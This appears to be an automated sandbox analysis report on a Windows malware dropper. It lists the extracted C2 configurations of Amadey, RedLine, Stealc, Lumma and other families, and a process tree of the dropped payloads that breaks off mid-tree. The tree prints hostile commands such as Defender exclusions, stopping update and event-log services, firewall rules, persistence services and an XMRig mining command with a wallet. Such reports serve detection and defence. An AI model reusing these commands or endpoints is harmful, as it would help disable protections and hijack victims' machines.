Analysis

  • max time kernel
    67s
  • max time network
    170s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 18:00

General

  • Target

    fd97d0b7ab1402fa0c7ea8fc7c10ca7d018cb6410ae88f6a48a7f4df331d81d3.exe

  • Size

    1.9MB

  • MD5

    4989aefc8b77298974d95ce814d5d259

  • SHA1

    059a4a516f48482de3b86534b3cb64e934e17657

  • SHA256

    fd97d0b7ab1402fa0c7ea8fc7c10ca7d018cb6410ae88f6a48a7f4df331d81d3

  • SHA512

    d4a7bf1599c7a3a1731317ac5c293467f132e9b5c47058218a9504156c1764ed627effb9bc4e16d34d38d01ae629633e37b4eac654529a1935457a33bd1d4247

  • SSDEEP

    49152:OrSvpy/qUbhxopFHYokOM+W2oPJ0QVRnM/x+e8nB9FaOom:8yEhx+FlF/aPP3Sx+eSjx

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

gcleaner

C2

185.172.128.90

5.42.64.56

5.42.65.64

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

lumma

C2

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 6 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 8 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd97d0b7ab1402fa0c7ea8fc7c10ca7d018cb6410ae88f6a48a7f4df331d81d3.exe
    "C:\Users\Admin\AppData\Local\Temp\fd97d0b7ab1402fa0c7ea8fc7c10ca7d018cb6410ae88f6a48a7f4df331d81d3.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:332
    • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4400
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:2612
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:1596
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:2628
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:4812
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4628
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  5⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:2324
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                  5⤵
                    PID:5544
                    • C:\Windows\SysWOW64\choice.exe
                      choice /C Y /N /D Y /T 3
                      6⤵
                        PID:5852
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 368
                    4⤵
                    • Program crash
                    PID:3096
                • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3768
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    4⤵
                      PID:3224
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      4⤵
                        PID:3808
                    • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:3692
                    • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                      3⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2800
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2480
                        • C:\Windows\SysWOW64\sc.exe
                          Sc stop GameServerClient
                          5⤵
                          • Launches sc.exe
                          PID:4352
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameServerClient confirm
                          5⤵
                          • Executes dropped EXE
                          PID:3528
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete GameSyncLink
                          5⤵
                          • Launches sc.exe
                          PID:2704
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameSyncLink confirm
                          5⤵
                          • Executes dropped EXE
                          PID:4904
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:3144
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start GameSyncLink
                          5⤵
                          • Executes dropped EXE
                          PID:2928
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                        4⤵
                          PID:1604
                          • C:\Windows\SysWOW64\sc.exe
                            Sc stop GameServerClientC
                            5⤵
                            • Launches sc.exe
                            PID:5236
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove GameServerClientC confirm
                            5⤵
                              PID:5296
                            • C:\Windows\SysWOW64\sc.exe
                              Sc delete PiercingNetLink
                              5⤵
                              • Launches sc.exe
                              PID:6004
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService remove PiercingNetLink confirm
                              5⤵
                                PID:6096
                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                5⤵
                                  PID:5400
                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                  GameService start PiercingNetLink
                                  5⤵
                                    PID:5488
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                  4⤵
                                    PID:5932
                                    • C:\Windows\SysWOW64\sc.exe
                                      Sc delete GameSyncLinks
                                      5⤵
                                      • Launches sc.exe
                                      PID:5976
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      GameService remove GameSyncLinks confirm
                                      5⤵
                                        PID:5936
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                        5⤵
                                          PID:3996
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService start GameSyncLinks
                                          5⤵
                                            PID:6068
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                          4⤵
                                            PID:2352
                                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of WriteProcessMemory
                                          PID:2568
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            4⤵
                                              PID:3520
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              4⤵
                                                PID:4212
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                4⤵
                                                  PID:4324
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  4⤵
                                                    PID:3992
                                                • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:1188
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    4⤵
                                                      PID:1556
                                                  • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                                                    3⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    PID:1272
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                                      4⤵
                                                      • Creates scheduled task(s)
                                                      PID:4888
                                                    • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5080
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 456
                                                        5⤵
                                                        • Program crash
                                                        PID:5288
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 512
                                                        5⤵
                                                        • Program crash
                                                        PID:5732
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 756
                                                        5⤵
                                                        • Program crash
                                                        PID:6036
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 764
                                                        5⤵
                                                        • Program crash
                                                        PID:5124
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 764
                                                        5⤵
                                                        • Program crash
                                                        PID:5236
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 808
                                                        5⤵
                                                        • Program crash
                                                        PID:4224
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 968
                                                        5⤵
                                                        • Program crash
                                                        PID:5468
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 996
                                                        5⤵
                                                        • Program crash
                                                        PID:5636
                                                    • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                                                      4⤵
                                                        PID:4352
                                                      • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                                        4⤵
                                                          PID:4764
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            PID:5948
                                                          • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                                            5⤵
                                                              PID:6012
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:5888
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                6⤵
                                                                  PID:4636
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                    7⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:4980
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  6⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:5576
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  6⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:4784
                                                            • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                                                              4⤵
                                                                PID:5184
                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  5⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:3540
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  5⤵
                                                                    PID:3520
                                                                    • C:\Windows\system32\wusa.exe
                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                      6⤵
                                                                        PID:5420
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:4056
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:5464
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:2408
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop bits
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:5528
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:4268
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                      5⤵
                                                                        PID:4332
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        5⤵
                                                                          PID:4572
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                          5⤵
                                                                            PID:1856
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                            5⤵
                                                                              PID:4596
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:4760
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:4652
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:1708
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:4676
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
                                                                      1⤵
                                                                        PID:2080
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4400 -ip 4400
                                                                        1⤵
                                                                          PID:464
                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                          "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:1912
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            2⤵
                                                                              PID:2704
                                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                              "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                              2⤵
                                                                                PID:2728
                                                                                • C:\Windows\Temp\279941.exe
                                                                                  "C:\Windows\Temp\279941.exe" --list-devices
                                                                                  3⤵
                                                                                    PID:4636
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5080 -ip 5080
                                                                                1⤵
                                                                                  PID:5260
                                                                                • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                  1⤵
                                                                                    PID:5348
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                    1⤵
                                                                                      PID:5520
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5080 -ip 5080
                                                                                      1⤵
                                                                                        PID:5584
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5080 -ip 5080
                                                                                        1⤵
                                                                                          PID:5972
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5080 -ip 5080
                                                                                          1⤵
                                                                                            PID:4180
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5080 -ip 5080
                                                                                            1⤵
                                                                                              PID:5224
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5080 -ip 5080
                                                                                              1⤵
                                                                                                PID:4928
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5080 -ip 5080
                                                                                                1⤵
                                                                                                  PID:5444
                                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                  1⤵
                                                                                                    PID:5504
                                                                                                    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                      "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                      2⤵
                                                                                                        PID:5836
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5080 -ip 5080
                                                                                                      1⤵
                                                                                                        PID:5704
                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                        "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                        1⤵
                                                                                                          PID:6072
                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                            2⤵
                                                                                                              PID:4180
                                                                                                              • C:\Windows\Temp\718265.exe
                                                                                                                "C:\Windows\Temp\718265.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                3⤵
                                                                                                                  PID:1732
                                                                                                            • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                              C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                              1⤵
                                                                                                                PID:5772
                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:5748
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                  2⤵
                                                                                                                    PID:4132
                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                      3⤵
                                                                                                                        PID:5528
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1740
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:5440
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4664
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:5512
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                      2⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3972
                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                      2⤵
                                                                                                                        PID:4812
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                        2⤵
                                                                                                                          PID:1132
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                          2⤵
                                                                                                                            PID:4968
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                            2⤵
                                                                                                                              PID:2852
                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                              C:\Windows\system32\conhost.exe
                                                                                                                              2⤵
                                                                                                                                PID:4900
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                  3⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:2156
                                                                                                                                • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                  "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
                                                                                                                                  3⤵
                                                                                                                                    PID:3052
                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                      4⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:4288
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                      4⤵
                                                                                                                                        PID:5904
                                                                                                                                        • C:\Windows\system32\wusa.exe
